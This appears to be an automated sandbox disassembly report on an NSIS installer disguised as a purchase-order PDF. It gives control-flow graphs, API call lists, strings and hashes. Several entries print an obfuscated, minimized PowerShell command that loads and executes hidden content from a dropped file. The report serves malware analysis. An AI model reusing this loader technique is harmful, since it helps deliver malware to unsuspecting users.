                                    control_flow_graph 562 4030d8-4030ec 563 4030f5-4030fd 562->563 564 4030ee 562->564 565 403104-403109 563->565 566 4030ff 563->566 564->563 567 403119-403126 call 4032b4 565->567 568 40310b-403114 call 4032ca 565->568 566->565 572 40326b 567->572 573 40312c-403130 567->573 568->567 574 40326d-40326e 572->574 575 403254-403256 573->575 576 403136-403156 GetTickCount call 4065ef 573->576 577 4032ad-4032b1 574->577 578 403258-40325b 575->578 579 40329f-4032a3 575->579 588 4032aa 576->588 590 40315c-403164 576->590 581 403260-403269 call 4032b4 578->581 582 40325d 578->582 583 403270-403276 579->583 584 4032a5 579->584 581->572 595 4032a7 581->595 582->581 586 403278 583->586 587 40327b-403289 call 4032b4 583->587 584->588 586->587 587->572 599 40328b-403297 call 405d01 587->599 588->577 593 403166 590->593 594 403169-403177 call 4032b4 590->594 593->594 594->572 600 40317d-403186 594->600 595->588 605 403250-403252 599->605 606 403299-40329c 599->606 602 40318c-4031a9 call 40660f 600->602 608 40324c-40324e 602->608 609 4031af-4031c6 GetTickCount 602->609 605->574 606->579 608->574 610 4031c8-4031d0 609->610 611 40320b-40320d 609->611 612 4031d2-4031d6 610->612 613 4031d8-403203 MulDiv wsprintfA call 4051e8 610->613 614 403240-403244 611->614 615 40320f-403213 611->615 612->611 612->613 622 403208 613->622 614->590 616 40324a 614->616 618 403215-40321a call 405d01 615->618 619 403228-40322e 615->619 616->588 623 40321f-403221 618->623 621 403234-403238 619->621 621->602 624 40323e 621->624 622->611 623->605 625 403223-403226 623->625 624->588 625->621
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CountTick$wsprintf
                                    • String ID: ... %d%%$8A$8A$xA$xA
                                    • API String ID: 551687249-266981132
                                    • Opcode ID: 2779a8c27ab4fa154f89a57db0462927349ddc59ff22a4c54c6aa2d2765dcfd2
                                    • Instruction ID: 5859ff30484dbc6f12110d744d50748fce684291dc682ebadfc23bb097a10b04
                                    • Opcode Fuzzy Hash: 2779a8c27ab4fa154f89a57db0462927349ddc59ff22a4c54c6aa2d2765dcfd2
                                    • Instruction Fuzzy Hash: BA515E71900219ABCB10AF66D944A9F7BACEF44756F1481BFE810B72D1C738CA41CBAD

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 626 401759-40177c call 402bce call 405ac6 631 401786-401798 call 4060c1 call 405a59 lstrcatA 626->631 632 40177e-401784 call 4060c1 626->632 637 40179d-4017a3 call 40639c 631->637 632->637 642 4017a8-4017ac 637->642 643 4017ae-4017b8 call 406435 642->643 644 4017df-4017e2 642->644 651 4017ca-4017dc 643->651 652 4017ba-4017c8 CompareFileTime 643->652 645 4017e4-4017e5 call 405c35 644->645 646 4017ea-401806 call 405c5a 644->646 645->646 654 401808-40180b 646->654 655 40187e-4018a7 call 4051e8 call 4030d8 646->655 651->644 652->651 656 401860-40186a call 4051e8 654->656 657 40180d-40184f call 4060c1 * 2 call 406154 call 4060c1 call 4057dd 654->657 667 4018a9-4018ad 655->667 668 4018af-4018bb SetFileTime 655->668 669 401873-401879 656->669 657->642 689 401855-401856 657->689 667->668 671 4018c1-4018cc FindCloseChangeNotification 667->671 668->671 672 402a63 669->672 675 4018d2-4018d5 671->675 676 402a5a-402a5d 671->676 674 402a65-402a69 672->674 679 4018d7-4018e8 call 406154 lstrcatA 675->679 680 4018ea-4018ed call 406154 675->680 676->672 686 4018f2-40238c call 4057dd 679->686 680->686 686->674 686->676 689->669 691 401858-401859 689->691 691->656
                                    APIs
                                    • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" ,C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility,00000000,00000000,00000031), ref: 00401798
                                    • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" ,"powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" ,00000000,00000000,"powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" ,C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility,00000000,00000000,00000031), ref: 004017C2
                                      • Part of subcall function 004060C1: lstrcpynA.KERNEL32(?,?,00000400,004033E4,00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004060CE
                                      • Part of subcall function 004051E8: lstrlenA.KERNEL32(Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                                      • Part of subcall function 004051E8: lstrlenA.KERNEL32(00403208,Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                                      • Part of subcall function 004051E8: lstrcatA.KERNEL32(Completed,00403208,00403208,Completed,00000000,004178E0,00000000), ref: 00405244
                                      • Part of subcall function 004051E8: SetWindowTextA.USER32(Completed,Completed), ref: 00405256
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                    • String ID: "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" $C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility$C:\Windows\system32\sektionslederes\snkekasses
                                    • API String ID: 1941528284-567320267
                                    • Opcode ID: 2476305132f036933cb377fb0227cb92ca1979367da5a6612f823a9c05f9f285
                                    • Instruction ID: ad8319ac8819e3f4f0647767249a41d8ee4e375b3a8deda6b30fbb54af0d7a5d
                                    • Opcode Fuzzy Hash: 2476305132f036933cb377fb0227cb92ca1979367da5a6612f823a9c05f9f285
                                    • Instruction Fuzzy Hash: D641B731900515BACF10BFA5CC45DAF3669EF45369B21423BF422B21E1CA7C8A528A6D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 693 4051e8-4051fd 694 4052b3-4052b7 693->694 695 405203-405215 693->695 696 405220-40522c lstrlenA 695->696 697 405217-40521b call 406154 695->697 699 405249-40524d 696->699 700 40522e-40523e lstrlenA 696->700 697->696 701 40525c-405260 699->701 702 40524f-405256 SetWindowTextA 699->702 700->694 703 405240-405244 lstrcatA 700->703 704 405262-4052a4 SendMessageA * 3 701->704 705 4052a6-4052a8 701->705 702->701 703->699 704->705 705->694 706 4052aa-4052ad 705->706 706->694
                                    APIs
                                    • lstrlenA.KERNEL32(Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                                    • lstrlenA.KERNEL32(00403208,Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                                    • lstrcatA.KERNEL32(Completed,00403208,00403208,Completed,00000000,004178E0,00000000), ref: 00405244
                                    • SetWindowTextA.USER32(Completed,Completed), ref: 00405256
                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                    • String ID: Completed
                                    • API String ID: 2531174081-3087654605
                                    • Opcode ID: f27698f2302dc729cc4947e7290bf36b72ac2c2b5ce3f33cd80fa01ec77ea105
                                    • Instruction ID: 13bf9d5a188301c634d68c5bb2c809f87baf544d33da629d3068cd84ff66c9cb
                                    • Opcode Fuzzy Hash: f27698f2302dc729cc4947e7290bf36b72ac2c2b5ce3f33cd80fa01ec77ea105
                                    • Instruction Fuzzy Hash: 7F218C71E00518BBDB119FA5DD81A9EBFB9EF09354F14807AF544B6290C7798A808F98

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 707 4056ae-4056f9 CreateDirectoryA 708 4056fb-4056fd 707->708 709 4056ff-40570c GetLastError 707->709 710 405726-405728 708->710 709->710 711 40570e-405722 SetFileSecurityA 709->711 711->708 712 405724 GetLastError 711->712 712->710
                                    APIs
                                    • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056F1
                                    • GetLastError.KERNEL32 ref: 00405705
                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040571A
                                    • GetLastError.KERNEL32 ref: 00405724
                                    Strings
                                    • C:\Users\user\Desktop, xrefs: 004056AE
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004056D4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                    • API String ID: 3449924974-1521822154
                                    • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                    • Instruction ID: 8fda383858cfa3d81fea8572b973588b51770532f266deb4a47d6cf866d68d21
                                    • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                    • Instruction Fuzzy Hash: 5E010871C00219EADF009BA0D944BEFBBB4EB04354F00403AD545B6190EB799648DF99

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 713 40645c-40647c GetSystemDirectoryA 714 406480-406482 713->714 715 40647e 713->715 716 406492-406494 714->716 717 406484-40648c 714->717 715->714 719 406495-4064c7 wsprintfA LoadLibraryExA 716->719 717->716 718 40648e-406490 717->718 718->719
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406473
                                    • wsprintfA.USER32 ref: 004064AC
                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                    • String ID: %s%s.dll$UXTHEME$\
                                    • API String ID: 2200240437-4240819195
                                    • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                    • Instruction ID: 6b99be200e9776e1d1f000c3a85ac26a44316f32ef7d7cf08124b5af377bafc3
                                    • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                    • Instruction Fuzzy Hash: C2F0FC305502096BDB15DB64DD0DFEB375CEB08304F1400BAA986E10C1EA78E5258B6D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 720 405c89-405c93 721 405c94-405cbf GetTickCount GetTempFileNameA 720->721 722 405cc1-405cc3 721->722 723 405cce-405cd0 721->723 722->721 724 405cc5 722->724 725 405cc8-405ccb 723->725 724->725
                                    APIs
                                    • GetTickCount.KERNEL32 ref: 00405C9D
                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CB7
                                    Strings
                                    • nsa, xrefs: 00405C94
                                    • "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe", xrefs: 00405C89
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C8C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CountFileNameTempTick
                                    • String ID: "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                    • API String ID: 1716503409-3485688139
                                    • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                    • Instruction ID: eb5fe80d68cc8fd1173ec18eddb4fdb1002e2dce10a9d595da193ea2316e06a4
                                    • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                    • Instruction Fuzzy Hash: BCF08236308308ABEB118F56ED04B9B7FACDF91750F10803BFA44DB280D6B499558798

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 726 402cd0-402cf9 call 405f47 728 402cfe-402d02 726->728 729 402db3-402db7 728->729 730 402d08-402d0c 728->730 731 402d31-402d44 730->731 732 402d0e-402d2f RegEnumValueA 730->732 734 402d6d-402d74 RegEnumKeyA 731->734 732->731 733 402d98-402da6 RegCloseKey 732->733 733->729 735 402d46-402d48 734->735 736 402d76-402d88 RegCloseKey call 4064ca 734->736 735->733 737 402d4a-402d5e call 402cd0 735->737 742 402da8-402dae 736->742 743 402d8a-402d96 RegDeleteKeyA 736->743 737->736 744 402d60-402d6c 737->744 742->729 743->729 744->734
                                    APIs
                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CloseEnum$DeleteValue
                                    • String ID:
                                    • API String ID: 1354259210-0
                                    • Opcode ID: e0560c3492abfc6ba69bbbbd147d7cad17a6c92fce96212b07645899f063db07
                                    • Instruction ID: 479b5507277e1ed98100a043d195c8e3d67278c142fcba22c9f5c581f71d1c0c
                                    • Opcode Fuzzy Hash: e0560c3492abfc6ba69bbbbd147d7cad17a6c92fce96212b07645899f063db07
                                    • Instruction Fuzzy Hash: DE215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11A0E7B48E94AA68

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 745 405b47-405b62 call 4060c1 call 405af2 750 405b64-405b66 745->750 751 405b68-405b75 call 40639c 745->751 752 405bba-405bbc 750->752 755 405b81-405b83 751->755 756 405b77-405b7b 751->756 758 405b99-405ba2 lstrlenA 755->758 756->750 757 405b7d-405b7f 756->757 757->750 757->755 759 405ba4-405bb8 call 405a59 GetFileAttributesA 758->759 760 405b85-405b8c call 406435 758->760 759->752 765 405b93-405b94 call 405aa0 760->765 766 405b8e-405b91 760->766 765->758 766->750 766->765
                                    APIs
                                      • Part of subcall function 004060C1: lstrcpynA.KERNEL32(?,?,00000400,004033E4,00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004060CE
                                      • Part of subcall function 00405AF2: CharNextA.USER32(?,?,C:\,?,00405B5E,C:\,C:\,75923410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                                      • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B05
                                      • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B19
                                    • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,75923410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B9A
                                    • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75923410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00405BAA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                    • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 3248276644-1964270705
                                    • Opcode ID: 833d5d7d4d88ab044a5975486a6ace5c2f1c8b1622a9b4308b288e25f9abd96d
                                    • Instruction ID: e51454695f06d4bf62575f1f71cc8d9d2da662beaff56aa2e5751c7b88ff0260
                                    • Opcode Fuzzy Hash: 833d5d7d4d88ab044a5975486a6ace5c2f1c8b1622a9b4308b288e25f9abd96d
                                    • Instruction Fuzzy Hash: 47F02835601E6029C622223A0C45BAF3A65CE8232474D013FFC51B52C2DB3CB943DE6E
                                    APIs
                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                      • Part of subcall function 004051E8: lstrlenA.KERNEL32(Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                                      • Part of subcall function 004051E8: lstrlenA.KERNEL32(00403208,Completed,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                                      • Part of subcall function 004051E8: lstrcatA.KERNEL32(Completed,00403208,00403208,Completed,00000000,004178E0,00000000), ref: 00405244
                                      • Part of subcall function 004051E8: SetWindowTextA.USER32(Completed,Completed), ref: 00405256
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                                      • Part of subcall function 004051E8: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                    • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2289964001.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2289938819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2289985883.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290018959.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2290459111.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_P.jbxd
                                    Similarity
                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                    • String ID:
                                    • API String ID: 2987980305-0
                                    • Opcode ID: b4a2e33c8f10a1447e8878106760cf47df9ad8d45f69dbadbaf9d6713dd36d7f
                                    • Instruction ID: 1a7932fae63aa7fb20f888994d80958c5ec2ba2518727ce514c528d89b281485
                                    • Opcode Fuzzy Hash: b4a2e33c8f10a1447e8878106760cf47df9ad8d45f69dbadbaf9d6713dd36d7f
                                    • Instruction Fuzzy Hash: 08210B32A00125EBCF207FA58F49B5F76B0AF50359F21423BF211B61D1CBBC8982965E
                                    APIs
                                      • Part of subcall function 00405AF2: CharNextA.USER32(?,?,C:\,?,00405B5E,C:\,C:\,75923410,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                                      • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B05
                                      • Part of subcall function 00405AF2: CharNextA.USER32(00000000), ref: 00405B19
                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                      • Part of subcall function 004056AE: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056F1
